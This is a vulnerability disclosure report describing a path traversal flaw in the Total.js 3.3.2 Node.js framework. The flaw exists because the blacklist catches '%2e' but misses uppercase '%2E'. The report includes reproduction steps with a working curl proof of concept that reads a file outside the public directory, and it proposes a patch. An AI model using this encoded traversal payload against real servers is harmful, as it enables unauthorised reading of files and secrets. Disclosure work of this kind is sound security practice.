[Total.js] Path traversal vulnerability allows to read files outside public directory

I would like to report path traversal in Total.js. It allows read arbitrary files outside public directory. # Module **module name:** Total.js **version:** 3.3.2 **npm page:** `https://www.npmjs.com/package/total.js` ## Module Description Total.js framework is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application. ## Module Stats 2,125 weekly downloads # Vulnerability ## Vulnerability Description Total.js blacklists `%2e` in the `req.uri.pathname` [[reference]](https://github.com/totaljs/framework/blob/3fd5788ef28f3caf944d76a1135ab367bc0953b8/index.js#L8088). However, it does not blacklist `%2E`. Using `%2E` can bypass the blacklist to gain path traversal. ## Steps To Reproduce: 1. Clone an empty project from Total.js: `git clone https://github.com/totaljs/emptyproject`. 2. Install Total.js within the directory: `cd emptyproject; npm install total.js`. 3. Launch the server: `node debug.js`. 4. Test path traversal: `curl http://localhost:8000/%2E%2E/debug.js`. ## Patch Also disallow `%2E` in the `pathname`. ## Supporting Material/References: - Ubuntu 18.04 - Node 12.13.1 - NPM 6.12.1 - cURL 7.58.0 # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact Path traversal